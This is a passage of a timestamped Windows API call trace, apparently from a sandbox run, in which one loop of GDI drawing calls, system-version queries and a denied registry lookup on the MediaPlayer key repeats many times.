(ho=0x11008c1) returned 1 [0017.435] DeleteObject (ho=0xad040713) returned 1 [0017.435] DeleteObject (ho=0xa304027d) returned 1 [0017.435] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.435] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.435] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.435] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.435] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.435] BeginPath (hdc=0x0) returned 0 [0017.435] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.435] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.435] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.435] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.435] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.435] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.435] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.435] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.435] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xae040713 [0017.435] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xa404027d [0017.435] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408c2 [0017.436] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408c3 [0017.436] CombineRgn (hrgnDst=0x10408c2, hrgnSrc1=0xae040713, hrgnSrc2=0xa404027d, iMode=1) returned 1 [0017.436] CombineRgn (hrgnDst=0x10408c3, hrgnSrc1=0xae040713, hrgnSrc2=0xa404027d, iMode=4) returned 2 [0017.436] CreateSolidBrush (color=0xff) returned 0x21008c1 [0017.436] CreateSolidBrush (color=0xff0000) returned 0x11008c4 [0017.436] DeleteObject (ho=0x11008c4) returned 1 [0017.436] DeleteObject (ho=0xa404027d) returned 1 [0017.436] DeleteObject (ho=0xae040713) returned 1 [0017.436] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.436] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.436] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.436] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.436] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.436] BeginPath (hdc=0x0) returned 0 [0017.436] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.436] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.436] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.436] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.436] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.436] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.436] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.436] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.436] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xa504027d [0017.436] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xaf040713 [0017.436] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408c5 [0017.436] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408c6 [0017.436] CombineRgn (hrgnDst=0x10408c5, hrgnSrc1=0xa504027d, hrgnSrc2=0xaf040713, iMode=1) returned 1 [0017.437] CombineRgn (hrgnDst=0x10408c6, hrgnSrc1=0xa504027d, hrgnSrc2=0xaf040713, iMode=4) returned 2 [0017.437] CreateSolidBrush (color=0xff) returned 0x21008c4 [0017.437] CreateSolidBrush (color=0xff0000) returned 0x11008c7 [0017.437] DeleteObject (ho=0x11008c7) returned 1 [0017.437] DeleteObject (ho=0xaf040713) returned 1 [0017.437] DeleteObject (ho=0xa504027d) returned 1 [0017.437] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.437] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.437] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.437] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.437] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.437] BeginPath (hdc=0x0) returned 0 [0017.437] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.437] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.437] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.437] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.437] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.437] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.437] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.437] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.437] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xb0040713 [0017.437] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xa604027d [0017.437] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408c8 [0017.437] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408c9 [0017.437] CombineRgn (hrgnDst=0x10408c8, hrgnSrc1=0xb0040713, hrgnSrc2=0xa604027d, iMode=1) returned 1 [0017.437] CombineRgn (hrgnDst=0x10408c9, hrgnSrc1=0xb0040713, hrgnSrc2=0xa604027d, iMode=4) returned 2 [0017.437] CreateSolidBrush (color=0xff) returned 0x21008c7 [0017.437] CreateSolidBrush (color=0xff0000) returned 0x11008ca [0017.437] DeleteObject (ho=0x11008ca) returned 1 [0017.438] DeleteObject (ho=0xa604027d) returned 1 [0017.438] DeleteObject (ho=0xb0040713) returned 1 [0017.438] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.438] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.438] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.438] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.438] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.438] BeginPath (hdc=0x0) returned 0 [0017.438] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.438] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.438] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.438] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.438] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.438] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.438] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.438] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.438] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xa704027d [0017.438] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xb1040713 [0017.438] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408cb [0017.438] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408cc [0017.438] CombineRgn (hrgnDst=0x10408cb, hrgnSrc1=0xa704027d, hrgnSrc2=0xb1040713, iMode=1) returned 1 [0017.438] CombineRgn (hrgnDst=0x10408cc, hrgnSrc1=0xa704027d, hrgnSrc2=0xb1040713, iMode=4) returned 2 [0017.438] CreateSolidBrush (color=0xff) returned 0x21008ca [0017.438] CreateSolidBrush (color=0xff0000) returned 0x11008cd [0017.438] DeleteObject (ho=0x11008cd) returned 1 [0017.438] DeleteObject (ho=0xb1040713) returned 1 [0017.438] DeleteObject (ho=0xa704027d) returned 1 [0017.438] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.438] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.439] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.439] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.439] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.439] BeginPath (hdc=0x0) returned 0 [0017.439] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.439] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.439] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.439] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.439] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.439] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.439] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.439] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.439] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xb2040713 [0017.439] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xa804027d [0017.439] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408ce [0017.439] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408cf [0017.439] CombineRgn (hrgnDst=0x10408ce, hrgnSrc1=0xb2040713, hrgnSrc2=0xa804027d, iMode=1) returned 1 [0017.439] CombineRgn (hrgnDst=0x10408cf, hrgnSrc1=0xb2040713, hrgnSrc2=0xa804027d, iMode=4) returned 2 [0017.439] CreateSolidBrush (color=0xff) returned 0x21008cd [0017.439] CreateSolidBrush (color=0xff0000) returned 0x11008d0 [0017.439] DeleteObject (ho=0x11008d0) returned 1 [0017.439] DeleteObject (ho=0xa804027d) returned 1 [0017.439] DeleteObject (ho=0xb2040713) returned 1 [0017.439] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.439] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.439] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.439] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.439] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.439] BeginPath (hdc=0x0) returned 0 [0017.439] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.440] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.440] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.440] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.440] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.440] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.440] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.440] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.440] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xa904027d [0017.440] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xb3040713 [0017.440] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408d1 [0017.440] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408d2 [0017.440] CombineRgn (hrgnDst=0x10408d1, hrgnSrc1=0xa904027d, hrgnSrc2=0xb3040713, iMode=1) returned 1 [0017.440] CombineRgn (hrgnDst=0x10408d2, hrgnSrc1=0xa904027d, hrgnSrc2=0xb3040713, iMode=4) returned 2 [0017.440] CreateSolidBrush (color=0xff) returned 0x21008d0 [0017.440] CreateSolidBrush (color=0xff0000) returned 0x11008d3 [0017.440] DeleteObject (ho=0x11008d3) returned 1 [0017.440] DeleteObject (ho=0xb3040713) returned 1 [0017.440] DeleteObject (ho=0xa904027d) returned 1 [0017.440] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.440] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.440] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.440] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.440] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.440] BeginPath (hdc=0x0) returned 0 [0017.440] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.440] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.440] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.440] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.440] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.440] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.441] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.441] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.441] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xb4040713 [0017.441] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xaa04027d [0017.441] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408d4 [0017.441] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408d5 [0017.441] CombineRgn (hrgnDst=0x10408d4, hrgnSrc1=0xb4040713, hrgnSrc2=0xaa04027d, iMode=1) returned 1 [0017.441] CombineRgn (hrgnDst=0x10408d5, hrgnSrc1=0xb4040713, hrgnSrc2=0xaa04027d, iMode=4) returned 2 [0017.441] CreateSolidBrush (color=0xff) returned 0x21008d3 [0017.441] CreateSolidBrush (color=0xff0000) returned 0x11008d6 [0017.441] DeleteObject (ho=0x11008d6) returned 1 [0017.441] DeleteObject (ho=0xaa04027d) returned 1 [0017.441] DeleteObject (ho=0xb4040713) returned 1 [0017.441] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.441] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.441] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.441] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.441] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.441] BeginPath (hdc=0x0) returned 0 [0017.441] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.441] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.441] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.441] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.441] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.441] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.441] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.441] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.442] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xab04027d [0017.442] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xb5040713 [0017.442] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408d7 [0017.442] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408d8 [0017.442] CombineRgn (hrgnDst=0x10408d7, hrgnSrc1=0xab04027d, hrgnSrc2=0xb5040713, iMode=1) returned 1 [0017.442] CombineRgn (hrgnDst=0x10408d8, hrgnSrc1=0xab04027d, hrgnSrc2=0xb5040713, iMode=4) returned 2 [0017.442] CreateSolidBrush (color=0xff) returned 0x21008d6 [0017.442] CreateSolidBrush (color=0xff0000) returned 0x11008d9 [0017.442] DeleteObject (ho=0x11008d9) returned 1 [0017.442] DeleteObject (ho=0xb5040713) returned 1 [0017.442] DeleteObject (ho=0xab04027d) returned 1 [0017.442] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.442] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.442] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.442] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.442] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.442] BeginPath (hdc=0x0) returned 0 [0017.442] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.442] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.442] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.442] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.442] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.442] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.442] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.442] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.442] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xb6040713 [0017.442] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xac04027d [0017.442] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408da [0017.442] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408db [0017.442] CombineRgn (hrgnDst=0x10408da, hrgnSrc1=0xb6040713, hrgnSrc2=0xac04027d, iMode=1) returned 1 [0017.443] CombineRgn (hrgnDst=0x10408db, hrgnSrc1=0xb6040713, hrgnSrc2=0xac04027d, iMode=4) returned 2 [0017.443] CreateSolidBrush (color=0xff) returned 0x21008d9 [0017.443] CreateSolidBrush (color=0xff0000) returned 0x11008dc [0017.443] DeleteObject (ho=0x11008dc) returned 1 [0017.443] DeleteObject (ho=0xac04027d) returned 1 [0017.443] DeleteObject (ho=0xb6040713) returned 1 [0017.443] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.443] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.443] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.443] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.443] SetDCPenColor (hdc=0x0, 